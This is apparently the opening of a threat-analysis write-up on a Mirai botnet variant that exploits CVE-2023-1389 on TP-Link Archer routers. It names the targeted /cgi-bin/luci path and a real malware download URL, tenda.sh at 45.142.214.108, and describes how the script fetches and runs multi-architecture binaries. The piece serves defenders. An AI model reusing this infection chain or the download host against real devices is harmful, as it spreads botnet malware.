Mirai variant leveraging CVE-2023-1389 Introduction On Feb 18 2024, our systems logged an activity from an endpoint on the internet trying to the hit the path /cgi-bin/luci Initial research on the internet quickly gave hints that this was an attempt to exploit CVE-2023-1389 , an unauthenticated remote code execution on TP-Link archer routers. The payload triggers on the victim router the download of a script http://45.142.214.108/tenda.sh The script tenda.sh tries to fetch a variety of static binaries, compiled for various architectures, before trying to run them with the argument tplink